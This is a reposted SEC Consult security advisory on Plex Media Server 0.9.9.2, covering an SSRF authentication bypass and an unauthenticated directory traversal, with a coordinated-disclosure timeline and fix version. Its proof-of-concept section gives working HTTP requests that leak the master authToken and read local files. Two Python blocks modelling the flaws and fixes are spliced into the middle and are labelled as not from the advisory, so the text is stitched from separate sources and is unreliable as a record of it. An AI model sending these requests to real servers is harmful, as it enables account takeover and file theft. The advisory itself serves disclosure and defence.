Plex Media Server 0.9.9.2.374-aa23a69 Bypass / File Disclosure

Date: 28 Feb 2014
Reported by: S. Viehböck
Type: packetstorm
Source: packetstormsecurity.com

Authentication bypass (SSRF) and local file disclosure in Plex Media Server affecting versions <=0.9.9.2.374-aa23a69

Code
SEC Consult Vulnerability Lab Security Advisory < 20140228-1 >  
=======================================================================  
title: Authentication bypass (SSRF) and local file disclosure   
product: Plex Media Server  
vulnerable version: <=0.9.9.2.374-aa23a69  
fixed version: >=0.9.9.3  
impact: Critical  
homepage: http://www.plex.tv  
found: 2014-02-06  
by: Stefan Viehböck  
SEC Consult Vulnerability Lab  
https://www.sec-consult.com  
=======================================================================  
  
Vendor/product description:  
-----------------------------  
"Plex is a media player system consisting of a player application with a  
10-foot user interface and an associated media server. It is available for  
Mac OS X, Linux, and Microsoft Windows."  
  
URL: https://en.wikipedia.org/wiki/Plex_(software)  
  
  
Vulnerability overview/description:  
-----------------------------------  
1. Authentication bypass / Server Side Request Forgery (SSRF)  
The Plex Media Server "/system/proxy" functionality fails to properly validate  
pre-authentication user requests. This allows unauthenticated attackers to make  
the Plex Media Server execute arbitrary HTTP requests.  
  
By requesting content from 127.0.0.1 an attacker can bypass all authentication  
and execute commands with administrative privileges.  
  
2. Unauthenticated local file disclosure  
Because of insufficient input validation, arbitrary local files can be  
disclosed. Files that include passwords and other sensitive information can  
be accessed.  
  
  
Plex "Remote" servers (thousands of them can be found via Shodan and Google,  
none of them were accessed) are affected by both vulnerabilities as well.  
  
  
Proof of concept:  
-----------------  
1. Authentication bypass / Server Side Request Forgery (SSRF)  
The following GET request bypasses the webserver whitelist.   
  
GET /system/proxy HTTP/1.1  
Host: <PLEX_WAN_HOST>  
X-Plex-Url: http://localhost:32400/myplex/account?IRRELEVANT=  
X-Plex-Url: http://my.plexapp.com/  
  
  
The last X-Plex-Url header value "http://my.plexapp.com/" is contained in  
the whitelist (regex) and passes validation. The request is then processed by  
the actual request handler in the backend webserver (Python). There both header  
values are concatenated with a comma, so the URL that is actually requested is  
controlled by the first X-Plex-Url value. Because that value ends in a query  
parameter (called IRRELEVANT), the comma and the whitelisted second value are  
absorbed into that parameter and have no effect on the target host or path.  
  
This results in the following request (made by Plex Media Server):  
  
GET /myplex/account?IRRELEVANT=,http://my.plexapp.com/ HTTP/1.1  
Host: localhost:32400  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)  
Connection: close  
Accept: */*  
Accept-Encoding: gzip  
  
  
The response for this request is passed to the attacker and includes the  
authToken value ("master token"), which can be used to impersonate legitimate  
Plex users. Of course other administrative actions can be performed as well.  
  
<?xml version="1.0" encoding="UTF-8"?>  
<MyPlex authToken="<REMOVED>" username="<REMOVED>" mappingState="mapped" mappingError="" mappingErrorMessage="1" signInState="ok" publicAddress="1" publicPort="9415" privateAddress="1" privatePort="32400" subscriptionFeatures="cloudsync,pass,sync" subscriptionActive="1" subscriptionState="Active">  
</MyPlex>  
  
  
A video demonstrating this issue has been released by SEC Consult:  
http://www.youtube.com/watch?v=f99fm4QU9u8  
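To make the discrepancy concrete, here is an added Python example (not code from the advisory or from Plex) that models the two-stage handling described above: a front-end regex whitelist that validates only the last X-Plex-Url value, and a backend that joins repeated header values with a comma. The regex, the function names, the allowlist and the request headers are constructed assumptions. The hardened check beside it shows what a proxy endpoint needs instead: reject repeated headers, parse the single URL that will actually be fetched, and validate its host against an exact allowlist.

```python
import re
from urllib.parse import urlsplit

# Constructed whitelist regex; an assumption standing in for the real one.
WHITELIST_RE = re.compile(r"^https?://([a-z0-9-]+\.)*plexapp\.com(/|$)")
# Constructed exact-match allowlist used by the hardened check.
ALLOWED_HOSTS = {"my.plexapp.com"}
LOOPBACK_HOSTS = {"localhost", "127.0.0.1", "::1", "0.0.0.0"}

# Constructed request, kept as ordered (name, value) pairs so that the
# repeated header survives exactly as the advisory's GET request sends it.
ATTACK_HEADERS = [
    ("Host", "plex.example.invalid"),
    ("X-Plex-Url", "http://localhost:32400/myplex/account?IRRELEVANT="),
    ("X-Plex-Url", "http://my.plexapp.com/"),
]


def header_values(headers, name):
    """All values of a header, in order of appearance."""
    return [v for n, v in headers if n.lower() == name.lower()]


def frontend_allows(headers):
    """Vulnerable front-end check: looks only at the last X-Plex-Url value."""
    values = header_values(headers, "X-Plex-Url")
    return bool(values) and WHITELIST_RE.match(values[-1]) is not None


def backend_effective_url(headers):
    """Vulnerable backend: repeated values are joined with a comma, so the
    first value decides scheme, host, port and path of the outgoing request."""
    return ",".join(header_values(headers, "X-Plex-Url"))


def proxied_target(headers):
    """(host, port, path, query) the backend would actually request."""
    parts = urlsplit(backend_effective_url(headers))
    return parts.hostname, parts.port, parts.path, parts.query


def hardened_allows(headers):
    """Hardened check: exactly one header, parse it, validate the parsed host.
    Production code should additionally resolve the name and check the
    resulting address, so that a DNS name pointing at loopback is also refused."""
    values = header_values(headers, "X-Plex-Url")
    if len(values) != 1:
        return False
    parts = urlsplit(values[0])
    host = parts.hostname
    if parts.scheme not in ("http", "https") or not host:
        return False
    if host in LOOPBACK_HOSTS or host.startswith("127."):
        return False
    return host in ALLOWED_HOSTS


if __name__ == "__main__":
    print("front-end whitelist passes:", frontend_allows(ATTACK_HEADERS))
    print("backend would fetch:", proxied_target(ATTACK_HEADERS))
    print("hardened check passes:", hardened_allows(ATTACK_HEADERS))
```

Running the block shows the whitelist accepting the request while the backend targets localhost:32400/myplex/account with the whitelisted URL relegated to the IRRELEVANT query parameter, which is the request the advisory reproduces above.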
  
  
2. Unauthenticated local file disclosure  
The following requests show different functionality that is vulnerable to  
directory traversal:  
  
GET /manage/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1  
Host: <HOST>  
  
GET /web/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1  
Host: <HOST>  
  
GET /:/resources/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1  
Host: <HOST>  
  
The /manage/ and /web/ handlers can be exploited without prior authentication.  
This vulnerability was confirmed on Windows, where the backslashes in the  
requests above are treated as path separators.  
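As an added example (not the advisory's or Plex's code), the following Python models a static-file handler like the /manage/ and /web/ handlers above: a naive resolver that filters only forward-slash traversal, beside a resolver that percent-decodes once, treats backslashes as separators before checking, and rejects absolute paths, drive letters and any ".." component. The root directory, helper names and sample requests are constructed for illustration.

```python
import re
from pathlib import PurePosixPath
from urllib.parse import unquote

# Constructed web root for the static handler; not a real Plex install path.
WEB_ROOT = "/srv/plex/web"


def naive_resolve(root, requested):
    """Vulnerable resolver (constructed): only forward-slash traversal is
    filtered, so '..\\..\\secret.txt' passes unchanged and, on Windows, the
    filesystem later treats each backslash as a separator and walks out of root."""
    if "../" in requested:
        return None
    return root.rstrip("/") + "/" + requested


def safe_resolve(root, requested):
    """Hardened resolver: normalise first, then check every path component.
    Returns the resolved path, or None when the request must be refused."""
    decoded = unquote(requested)             # single decode: %2e%2e%5c -> ..\
    if "\x00" in decoded:                    # NUL can truncate paths in C APIs
        return None
    normalised = decoded.replace("\\", "/")  # backslash is a separator on Windows
    if normalised.startswith("/") or re.match(r"^[A-Za-z]:", normalised):
        return None                          # absolute paths and drive letters
    parts = [p for p in PurePosixPath(normalised).parts if p not in ("", ".")]
    if not parts or ".." in parts:
        return None                          # any parent reference is refused
    return str(PurePosixPath(root).joinpath(*parts))


if __name__ == "__main__":
    # Constructed sample requests mirroring the shapes used in the advisory.
    for req in ("js/app.js", "..\\..\\..\\secret.txt", "../../secret.txt",
                "%2e%2e%5c%2e%2e%5csecret.txt", "C:\\Windows\\win.ini"):
        print(repr(req), "naive:", naive_resolve(WEB_ROOT, req),
              "safe:", safe_resolve(WEB_ROOT, req))
```

The point of the ordering in safe_resolve is that every transformation the filesystem will later apply (decoding, separator handling) is applied before the check, so the check and the filesystem agree on what the path means.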
  
  
  
Vulnerable / tested versions:  
-----------------------------  
The vulnerabilities have been verified to exist in Plex Media Server version  
0.9.9.2.374-aa23a69.  
  
  
Vendor contact timeline:  
------------------------  
2014-02-09: Contacting vendor through [email protected] and requesting  
encryption keys.  
2014-02-10: Vendor provides encryption keys.  
2014-02-10: Sending advisory and proof of concept exploit.  
2014-02-10: Vendor acknowledges receipt of advisory.  
2014-02-17: Requesting status update.  
2014-02-17: Vendor provides release timeline.  
2014-02-20: Vendor releases fixed version (0.9.9.3).  
2014-02-21: Requesting clarification regarding fixed version.  
2014-02-21: Vendor provides further information about fixed version and  
other reported vulnerabilities.  
2014-02-28: SEC Consult releases coordinated security advisory.  
  
  
Solution:  
---------  
Update to a more recent version of Plex Media Server (e.g. 0.9.9.5).  
  
  
Workaround:  
-----------  
No workaround available.  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius  
  
Headquarter:  
Mooslackengasse 17, 1190 Vienna, Austria  
Phone: +43 1 8903043 0  
Fax: +43 1 8903043 15  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
Interested in working with the experts of SEC Consult?  
Write to [email protected]  
  
EOF Stefan Viehböck / @2014  
